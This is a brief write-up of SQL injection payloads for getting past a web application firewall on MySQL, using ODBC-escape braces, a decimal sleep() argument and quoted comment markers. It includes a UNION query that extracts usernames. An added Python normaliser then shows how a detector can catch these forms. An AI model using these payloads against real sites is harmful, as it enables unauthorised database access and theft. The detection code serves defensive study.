SQL injection: bypassing a certain WAF
Simple boolean test
Entering and 1=1 directly is blocked
Use a MySQL quirk ("black magic")
and{a 1=1} and{a 1=2} are not blocked
Tested locally: MySQL executes the statement normally
Simple time-delay test
and sleep(1)
After a quick test, adding a . inside the parentheses is enough to bypass it: and sleep(1.1)
order by
and{a%201="/*"}%20order%20by%209%20--%20*/
union query
Same idea as order by
%20and{a%201="/*"}union%20select%201,2,username%20from%20users%20--%20*/
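Added example (not from the original post): a Python normaliser showing why each of the forms above slips past naive signature matching and what a detector has to do first: decode, neutralise string literals before stripping comments (so a quoted "/*" is not treated as a comment start), and collapse MySQL's ODBC escape syntax {identifier expr}, which evaluates to expr with the identifier ignored and is what the and{a 1=1} form relies on. The naive rule and the sample inputs are constructed here to mirror the page's payloads; they are not the WAF's real rules.

```python
import re
from urllib.parse import unquote_plus

# Constructed naive WAF-style rule: matches raw decoded text, cuts everything
# after "/*" as a comment, and only knows sleep() with an integer argument.
NAIVE_RULE = re.compile(
    r"\b(?:and|or) \d+=\d+\b|\bsleep\(\d+\)|\border by \d+|\bunion select\b", re.I)

def naive_blocked(raw: str) -> bool:
    q = re.sub(r"/\*.*", "", unquote_plus(raw), flags=re.S)  # "comment" to end
    return bool(NAIVE_RULE.search(q))

# Normalising detector: literals first, then comments, then {identifier expr}.
STRING_LITERAL = re.compile(r"'(?:[^'\\]|\\.)*'" + "|" + r'"(?:[^"\\]|\\.)*"')
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)
LINE_COMMENT = re.compile(r"(?:--[ \t]|#)[^\n]*")
ODBC_ESCAPE = re.compile(r"\{\s*[A-Za-z_]\w*\s+([^{}]*)\}")

def normalize(raw: str) -> str:
    q = unquote_plus(raw)
    q = STRING_LITERAL.sub("'S'", q)   # a "/*" inside quotes is data, not a comment
    q = BLOCK_COMMENT.sub(" ", q)
    q = LINE_COMMENT.sub(" ", q)
    prev = None
    while prev != q:                   # unwrap nested {a {b expr}} escapes
        prev, q = q, ODBC_ESCAPE.sub(r" \1 ", q)
    return re.sub(r"\s+", " ", q).strip().lower()

SIGNATURES = {
    "boolean": re.compile(r"\b(?:and|or) (?:\d+|'s')\s*=\s*(?:\d+|'s')"),
    "time": re.compile(r"\bsleep\s*\(\s*\d+(?:\.\d+)?\s*\)"),  # sleep(1.1) too
    "order_by": re.compile(r"\border by \d+"),
    "union": re.compile(r"\bunion(?: all)? select\b"),
}

def classify(raw: str) -> list:
    """Return the signature names that fire on the normalised input."""
    q = normalize(raw)
    return [name for name, rx in SIGNATURES.items() if rx.search(q)]

if __name__ == "__main__":
    # Constructed inputs mirroring the payload shapes discussed on this page.
    for p in ["and 1=1", "and{a 1=1}", "and sleep(1.1)",
              'and{a%201="/*"}%20order%20by%209%20--%20*/']:
        print(repr(p), "naive:", naive_blocked(p), "normalised:", classify(p))
```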